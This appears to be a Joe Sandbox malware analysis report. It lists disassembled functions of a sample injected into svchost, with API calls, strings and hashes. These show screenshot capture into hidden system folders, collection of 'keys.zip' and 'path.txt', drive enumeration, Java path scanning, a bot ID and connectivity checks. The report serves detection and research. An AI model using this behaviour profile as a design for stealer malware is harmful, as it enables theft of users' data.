Instruction Fuzzy Hash: 7BA1E2719447419FDB22DF34C8947A6BFE5AF85308F14C6ACD88A8B242EB71D60DCB91

Function 02C8D268 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 235COMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(82C318F9), ref: 02C8D284
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D2BE
GetLastError.KERNEL32 ref: 02C8D2C8
IsUserAnAdmin.SHELL32 ref: 02C8D2D0
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D2DF
SetLastError.KERNEL32(00000000), ref: 02C8D2E6
PathAddBackslashA.SHLWAPI(82C318F9,?,?), ref: 02C8D389
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D3C3
GetLastError.KERNEL32 ref: 02C8D3CD
IsUserAnAdmin.SHELL32 ref: 02C8D3D5
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D3E4
SetLastError.KERNEL32(00000000), ref: 02C8D3EB
SetErrorMode.KERNEL32(?), ref: 02C8D4F2

Strings

.zip, xrefs: 02C8D348
keys, xrefs: 02C8D2F9
.txt, xrefs: 02C8D448
path, xrefs: 02C8D3FE
82C318F9, xrefs: 02C8D27F, 02C8D28A, 02C8D384, 02C8D38F

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Error$LastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Mode
String ID: .txt$.zip$82C318F9$keys$path
API String ID: 3293890905-7519244
Opcode ID: e3d100074f92705510d1429fcbc914268e46e4abc397a2cd9195c4c0cc4227d6
Instruction ID: aee6f32301bdcdfa9a6d4cc34bc4f8d0ee578be413322cb3f489d5fcad6d9f42
Opcode Fuzzy Hash: e3d100074f92705510d1429fcbc914268e46e4abc397a2cd9195c4c0cc4227d6
Instruction Fuzzy Hash: DB81E9315086868FC716DB3894687ABBBE5EFC5349F18CA58E8CAD7241EB31D509C781

Function 02C89BE0 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 189memoryfilestringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C89C00

Part of subcall function 02C89B20: PathAddBackslashA.SHLWAPI(82C3182D), ref: 02C89B47
Part of subcall function 02C89B20: GetFileAttributesA.KERNEL32(?), ref: 02C89B85
Part of subcall function 02C89B20: PathFileExistsA.SHLWAPI(?), ref: 02C89BC9

PathAddBackslashA.SHLWAPI(82C3182D), ref: 02C89C48
SetFileAttributesA.KERNEL32(?,00000000), ref: 02C89CB0
DeleteFileA.KERNEL32(?), ref: 02C89CBD
PathAddBackslashA.SHLWAPI(82C3182D,?,?), ref: 02C89CF7
SetCurrentDirectoryA.KERNEL32(?), ref: 02C89D7A
VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02C89D8E
lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02C89DA1
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000), ref: 02C89DD0
PathAddBackslashA.SHLWAPI(82C3182D), ref: 02C89DDB
GetProcessHeap.KERNEL32(00000000,?), ref: 02C89DFE
HeapValidate.KERNEL32(00000000), ref: 02C89E01
GetProcessHeap.KERNEL32(00000000,?), ref: 02C89E0E
HeapFree.KERNEL32(00000000), ref: 02C89E11

Strings

keys.zip, xrefs: 02C89D3B
82C3182D, xrefs: 02C89C43, 02C89C4E, 02C89CF2, 02C89CFD, 02C89DD6, 02C89DE6
path.txt, xrefs: 02C89C8D
5NT, xrefs: 02C89DE1

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashFileHeap$AttributesFreeProcessVirtual$AllocCurrentDeleteDirectoryExistsValidatelstrcpynmemset
String ID: 5NT$82C3182D$keys.zip$path.txt
API String ID: 2685098104-1268902542
Opcode ID: c76f9a911eba22ee1312f3e01cc86fb43b923aab6fb7c8ea42aaa922a96ca9e6
Instruction ID: c06213b1eed9abbb4c11ff5360907248da8ade7d6854d3c723d800ba307d5478
Opcode Fuzzy Hash: c76f9a911eba22ee1312f3e01cc86fb43b923aab6fb7c8ea42aaa922a96ca9e6
Instruction Fuzzy Hash: 06517931A406855FDB129B389C98BF6BFE89F81308F1485E5E986DB341EB719948CB50

Function 02C8E920 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 150memoryfileCOMMON

Download Yara Rule

APIs

StrStrIW.SHLWAPI(02C7136E,\java\,?,75AF5180,00000000,?,?,02C7136E,?,?), ref: 02C8E959
StrStrIW.SHLWAPI(02C7136E,\windows\,?,?,02C7136E,?,?), ref: 02C8E969
WideCharToMultiByte.KERNEL32(00000000,00000000,02C7136E,000000FF,00000000,00000000,00000000,00000000,?,?,02C7136E,?,?), ref: 02C8E97C
GetProcessHeap.KERNEL32(00000008,00000013,?,?,02C7136E,?,?), ref: 02C8E998
HeapAlloc.KERNEL32(00000000,?,?,02C7136E,?,?), ref: 02C8E99F
memset.MSVCRT ref: 02C8E9AF
WideCharToMultiByte.KERNEL32(00000000,00000000,02C7136E,000000FF,00000000,00000000,00000000,00000000,?,?,02C7136E,?,?), ref: 02C8E9CF
GetShortPathNameA.KERNEL32(00000000,00000000,00000104), ref: 02C8E9E4
GetFileSizeEx.KERNEL32(?,?,?,?,02C7136E,?,?), ref: 02C8EA05
ReadFile.KERNEL32 ref: 02C8EA32
SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,75AF5180,00000000,?,?,02C7136E,?,?), ref: 02C8EA8E
GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C7136E,?,?), ref: 02C8EAA1
HeapValidate.KERNEL32(00000000,?,?,02C7136E,?,?), ref: 02C8EAA4
GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C7136E,?,?), ref: 02C8EAB1
HeapFree.KERNEL32(00000000,?,?,02C7136E,?,?), ref: 02C8EAB4

Strings

iBKS, xrefs: 02C8EA42
\java\, xrefs: 02C8E953
\windows\, xrefs: 02C8E963

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$ByteCharMultiWide$AllocFreeNamePathPointerReadShortSizeValidatememset
String ID: \java\$\windows\$iBKS
API String ID: 3070551764-2513530025
Opcode ID: 262073bbefefa13faee61674ddda304c66a7232f08ba1088c6c5e34d9c5f0139
Instruction ID: ff8bf14a6dcb9fd73a4fdef842a0580c8f30e8ec5885aa7bb6a116afd196ec38
Opcode Fuzzy Hash: 262073bbefefa13faee61674ddda304c66a7232f08ba1088c6c5e34d9c5f0139
Instruction Fuzzy Hash: 5041C471A843616BE721AF259C48FBB7AACFFC4F19F048618F814D71C0EB70DA0586A1

Function 02C82140 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 97stringthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C82160
GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C821A8
SetErrorMode.KERNEL32(00000001,?,?,id=,user!899552!E7E3D226), ref: 02C821BE
GetCurrentThread.KERNEL32 ref: 02C821C6
SetThreadPriority.KERNEL32(00000000,?,id=,user!899552!E7E3D226), ref: 02C821CD
lstrcpynA.KERNEL32(02CCBADC,?,00000005,?,id=,user!899552!E7E3D226), ref: 02C821EF
GetDriveTypeA.KERNEL32(02CCBADC,?,id=,user!899552!E7E3D226), ref: 02C821F6

Part of subcall function 02C82030: memset.MSVCRT ref: 02C82051
Part of subcall function 02C82030: GetDriveTypeA.KERNEL32(02CCBADC,?,?,?), ref: 02C82068
Part of subcall function 02C82030: SetCurrentDirectoryA.KERNEL32(02CCBADC,?,?,?), ref: 02C82078
Part of subcall function 02C82030: _snprintf.MSVCRT ref: 02C820A5
Part of subcall function 02C82030: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02C820C7
Part of subcall function 02C82030: WriteFile.KERNEL32(00000000,?,00000104,02C82265,00000000,00000000,76229300), ref: 02C820FB
Part of subcall function 02C82030: GetHandleInformation.KERNEL32(00000000,02C82265), ref: 02C82112
Part of subcall function 02C82030: CloseHandle.KERNEL32(00000000), ref: 02C82123

lstrcpynA.KERNEL32(02CCBADC,?,00000005,?,id=,user!899552!E7E3D226), ref: 02C8223F
GetDriveTypeA.KERNEL32(02CCBADC,?,id=,user!899552!E7E3D226), ref: 02C82246

Strings

System, xrefs: 02C8219E
Software, xrefs: 02C82197
Console, xrefs: 02C8217B
Control Panel, xrefs: 02C82182
Environment, xrefs: 02C82189
id=, xrefs: 02C8214A
user!899552!E7E3D226, xrefs: 02C82149
AppEvents, xrefs: 02C82174, 02C82294, 02C822A0
Identities, xrefs: 02C82190

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Drive$Type$CurrentFileHandleThreadlstrcpynmemset$CloseCreateDirectoryErrorInformationLogicalModePriorityStringsWrite_snprintf
String ID: AppEvents$Console$Control Panel$user!899552!E7E3D226$Environment$Identities$Software$System$id=
API String ID: 3198928771-1947164097
Opcode ID: 7f4264227056759e5aa3bc13f166b870f38044dcd9dfb47c7cb8d14f2000768e
Instruction ID: 21637d07351c62209abd453d13aea30da296579d93d7853852444d9999779526
Opcode Fuzzy Hash: 7f4264227056759e5aa3bc13f166b870f38044dcd9dfb47c7cb8d14f2000768e
Instruction Fuzzy Hash: 5E31F6B1980294AFD712EFE49C4D79EBB69EF8031CF904698ED08A7140D7704E55CF96

Function 02C8B100 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 111sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(82C3184B), ref: 02C8B127
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B175
GetLastError.KERNEL32 ref: 02C8B181
IsUserAnAdmin.SHELL32 ref: 02C8B185
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B196
SetLastError.KERNEL32(00000000), ref: 02C8B19D
PathAddBackslashA.SHLWAPI(?), ref: 02C8B1D0
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B1DF
GetLastError.KERNEL32 ref: 02C8B1E5
IsUserAnAdmin.SHELL32 ref: 02C8B1E9
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B1FA
SetLastError.KERNEL32(00000000), ref: 02C8B201
_snprintf.MSVCRT ref: 02C8B22F
Sleep.KERNEL32(00000FA0,?), ref: 02C8B245

Strings

scrs, xrefs: 02C8B1B8
%s\%02d.bmp, xrefs: 02C8B21E
82C3184B, xrefs: 02C8B122, 02C8B12D

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
String ID: %s\%02d.bmp$82C3184B$scrs
API String ID: 1455050916-2608159857
Opcode ID: a2d51a5827884aeba548fcc68a2a58e4ab6ff3698e1df2d5993144c738e64f0b
Instruction ID: 1702d08459725db940bfbe12de1844016283b2e0f2e6e241e9736916e4f7f2d0
Opcode Fuzzy Hash: a2d51a5827884aeba548fcc68a2a58e4ab6ff3698e1df2d5993144c738e64f0b
Instruction Fuzzy Hash: 48315B72D402585BCB21DB749C88BEB77A8EF85308F4446D4EA89D7100DF70DA59CBA0

Function 02C90120 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 111sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(82c31b90), ref: 02C90147
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C90195
GetLastError.KERNEL32 ref: 02C901A1
IsUserAnAdmin.SHELL32 ref: 02C901A5
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C901B6
SetLastError.KERNEL32(00000000), ref: 02C901BD
PathAddBackslashA.SHLWAPI(?), ref: 02C901F0
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C901FF
GetLastError.KERNEL32 ref: 02C90205
IsUserAnAdmin.SHELL32 ref: 02C90209
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C9021A
SetLastError.KERNEL32(00000000), ref: 02C90221
_snprintf.MSVCRT ref: 02C9024F
Sleep.KERNEL32(00000FA0,?), ref: 02C90265

Strings

scrs, xrefs: 02C901D8
%s\%02d.bmp, xrefs: 02C9023E
82c31b90, xrefs: 02C90142, 02C9014D

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
String ID: %s\%02d.bmp$82c31b90$scrs
API String ID: 1455050916-4264751522
Opcode ID: 487721265e4893e57a4193ffd79a2ec7ca49d1261bb5d937a2dce87be9f48486
Instruction ID: 9288b0c1c4f02724dd8a4a36e7fd7d1f34b3c2ca216c9da405f7a4d7332aa7bc
Opcode Fuzzy Hash: 487721265e4893e57a4193ffd79a2ec7ca49d1261bb5d937a2dce87be9f48486
Instruction Fuzzy Hash: 2531F672D402995BDF269B74AC9CBEB77A8AF85300F4446D4EA89D3100DF70DA59CBA0

Function 02C8E0B0 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 83sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02C8E0CC
Sleep.KERNEL32(00000064), ref: 02C8E0E2
OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02C8E0F0
ReleaseMutex.KERNEL32(00000000), ref: 02C8E0F9
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8E117
CloseHandle.KERNEL32(00000000), ref: 02C8E125
CreateThread.KERNEL32(00000000,00000000,02C8DCE0,00000000,00000000,00000000), ref: 02C8E13A
Sleep.KERNEL32(00009C40), ref: 02C8E14B
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C8E150
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8E164
CloseHandle.KERNEL32(00000000), ref: 02C8E172
PathAddBackslashA.SHLWAPI(82C31967), ref: 02C8E17D
Sleep.KERNEL32(00009C40,82C31967,FAKTURA), ref: 02C8E197

Strings

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}, xrefs: 02C8E0C0, 02C8E0E4
FAKTURA, xrefs: 02C8E183
P0#v, xrefs: 02C8E0F9
82C31967, xrefs: 02C8E178, 02C8E188

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
String ID: 82C31967$FAKTURA$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$P0#v
API String ID: 2736094147-505050827
Opcode ID: f9032c7081471ea81e07acd4e2152d90b91346d408efa5e92d328250e3b16b25
Instruction ID: bf16f44e971ad8498760596df9b01a7b91daa047f741fd308cd832d96a808c2e
Opcode Fuzzy Hash: f9032c7081471ea81e07acd4e2152d90b91346d408efa5e92d328250e3b16b25
Instruction Fuzzy Hash: 05214931EC07557AF322B7608C0AF6A738C9F85B29F148B18FE14631C1CBB0E9014AA6

Function 02C77370 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 156synchronizationmemorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02C7738C
GetThreadDesktop.USER32(00000000,?,?,02C77262,00000000,00000000), ref: 02C77393
SetThreadDesktop.USER32(00000000,?,?,02C77262,00000000,00000000), ref: 02C7739F

Part of subcall function 02C7CAA0: GetTickCount.KERNEL32 ref: 02C7CAA8
Part of subcall function 02C7CAA0: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAB9
Part of subcall function 02C7CAA0: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02CBD6C0), ref: 02C7CAE3
Part of subcall function 02C7CAA0: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAFC
Part of subcall function 02C7CAA0: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CBD66C), ref: 02C7CB29
Part of subcall function 02C7CAA0: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB3C
Part of subcall function 02C7CAA0: CreateMutexA.KERNEL32(00000000,00000000,02CBD790,?,?,02C77262,00000000,00000000), ref: 02C7CB5A
Part of subcall function 02C7CAA0: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB6B
Part of subcall function 02C7CAA0: CreateMutexA.KERNEL32(00000000,00000000,02CBD750,?,?,02C77262,00000000,00000000), ref: 02C7CB7F
Part of subcall function 02C7CAA0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB98
Part of subcall function 02C7CAA0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBAB
Part of subcall function 02C7CAA0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBBE

Part of subcall function 02C7CBF0: memset.MSVCRT ref: 02C7CC09
Part of subcall function 02C7CBF0: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 02C7CC22

Part of subcall function 02C98320: malloc.MSVCRT ref: 02C98332

HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 02C77437
HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 02C77445
lstrcpyA.KERNEL32(00000000,fuck), ref: 02C7744F

Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75

WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 02C774F2
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02C77501
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02C77530
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7753F
ReleaseMutex.KERNEL32(00000000), ref: 02C7754D
SetEvent.KERNEL32(00000000), ref: 02C77556
Sleep.KERNEL32(00002710,?,00000000), ref: 02C7759C

Strings

fuck, xrefs: 02C77447
P0#v, xrefs: 02C774BB
user!899552!E7E3D226, xrefs: 02C773D6

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Create$EventFileMutexObjectSingleWait$HeapThreadmemset$AllocCheckConnectionDesktopInternetMappingViewlstrcpyn$AdminAliveCacheCountCurrentFlushNetworkReleaseResolverSleepTickUserVersionlstrcpymalloc
String ID: user!899552!E7E3D226$P0#v$fuck
API String ID: 2939156510-3660658081
Opcode ID: 2d7c50fa93b956e0672c43a51721cda743f6e35ab882156119189896743e9e10
Instruction ID: 8bb9a241b0db1dacf2ee8b41bc80e65b0e64538a45a66047102142ce9d1b3c7c
Opcode Fuzzy Hash: 2d7c50fa93b956e0672c43a51721cda743f6e35ab882156119189896743e9e10
Instruction Fuzzy Hash: 7C51B0B19802449FDB11DF64D84CFA67BE9FB88314F158BBAE9584B291C730E518CF60

Function 02C87230 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 149fileCOMMON

Download Yara Rule

APIs

fseek.MSVCRT ref: 02C87276
fwrite.MSVCRT ref: 02C87285
fseek.MSVCRT ref: 02C8729B
fread.MSVCRT ref: 02C872A8
fseek.MSVCRT ref: 02C87332
fwrite.MSVCRT ref: 02C8733F
fclose.MSVCRT ref: 02C87347

Part of subcall function 02C86D00: fseek.MSVCRT ref: 02C86D8B
Part of subcall function 02C86D00: fwrite.MSVCRT ref: 02C86DA2
Part of subcall function 02C86D00: fwrite.MSVCRT ref: 02C86DB1
Part of subcall function 02C86D00: fwrite.MSVCRT ref: 02C86DD1

free.MSVCRT ref: 02C87360
free.MSVCRT ref: 02C87366
free.MSVCRT ref: 02C8736C
free.MSVCRT ref: 02C87372
free.MSVCRT ref: 02C8737B
free.MSVCRT ref: 02C87381
free.MSVCRT ref: 02C87384
free.MSVCRT ref: 02C87393

Strings

82c31cf4, xrefs: 02C87237

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: free$fwrite$fseek$fclosefread
String ID: 82c31cf4
API String ID: 2434908339-1946308177
Opcode ID: c40e4bed5cf97454075a45736d22c2bd94892342a3efaa6722b600237556d0fc
Instruction ID: 1e974ff73977e1a7b5a8d9bb28150bf6261c6c699c825a5e133cf8dde1618f11
Opcode Fuzzy Hash: c40e4bed5cf97454075a45736d22c2bd94892342a3efaa6722b600237556d0fc
Instruction Fuzzy Hash: 8341F671A406449FD720EBA8CC85B6AF3E8EF98314F248A2DE985C37D1D278F4458B61

Function 02C909A0 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(82c31c07), ref: 02C909CA
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C90A0C
GetLastError.KERNEL32 ref: 02C90A18
IsUserAnAdmin.SHELL32 ref: 02C90A1C
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C90A2D
SetLastError.KERNEL32(00000000), ref: 02C90A34
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C90A63
GetLastError.KERNEL32 ref: 02C90A69
IsUserAnAdmin.SHELL32 ref: 02C90A6D
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C90A7E
SetLastError.KERNEL32(00000000), ref: 02C90A85
_snprintf.MSVCRT ref: 02C90ABA
Sleep.KERNEL32(00000FA0,?), ref: 02C90AD0

Strings

scrs, xrefs: 02C90A49
%s\%02d.bmp, xrefs: 02C90AA9
82c31c07, xrefs: 02C909C5, 02C909D0

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
String ID: %s\%02d.bmp$82c31c07$scrs
API String ID: 224938940-3120923735
Opcode ID: 542c1874f4bc3e52dd528810bb4d1963d2f2196f39eb4ecada1477f36d36a40c
Instruction ID: 9adedc9061a233322b623d4569dee6cd3ded6863e4bc389879186b729274d846
Opcode Fuzzy Hash: 542c1874f4bc3e52dd528810bb4d1963d2f2196f39eb4ecada1477f36d36a40c
Instruction Fuzzy Hash: 9A310571E402985BDB219B749C5CBEBBBA8EF95300F4546D4EA89D3100DF70DA55CBA0

Function 02C8A150 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(82c3181f), ref: 02C8A17A
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8A1BC
GetLastError.KERNEL32 ref: 02C8A1C8
IsUserAnAdmin.SHELL32 ref: 02C8A1CC
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8A1DD
SetLastError.KERNEL32(00000000), ref: 02C8A1E4
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8A213
GetLastError.KERNEL32 ref: 02C8A219
IsUserAnAdmin.SHELL32 ref: 02C8A21D
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8A22E
SetLastError.KERNEL32(00000000), ref: 02C8A235
_snprintf.MSVCRT ref: 02C8A26A
Sleep.KERNEL32(00000FA0,?), ref: 02C8A280

Strings

scrs, xrefs: 02C8A1F9
%s\%02d.bmp, xrefs: 02C8A259
82c3181f, xrefs: 02C8A175, 02C8A180

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
String ID: %s\%02d.bmp$82c3181f$scrs
API String ID: 224938940-3555506977
Opcode ID: 6be01b82df11ddc65da618c02c39694b16699051bfaa5acf49fb64867bc43323
Instruction ID: 81399e7e759840fcf260adc1e0ba70d5316192ef898cd4b424ea9abbfecd5d93
Opcode Fuzzy Hash: 6be01b82df11ddc65da618c02c39694b16699051bfaa5acf49fb64867bc43323
Instruction Fuzzy Hash: 70315871E002989BCB21EB349C98BEB7BA8EF85304F0486D5E989C3100DF30DA54CBA0

Function 02C91960 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(82c31d1a), ref: 02C9198A
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C919CC
GetLastError.KERNEL32 ref: 02C919D8
IsUserAnAdmin.SHELL32 ref: 02C919DC
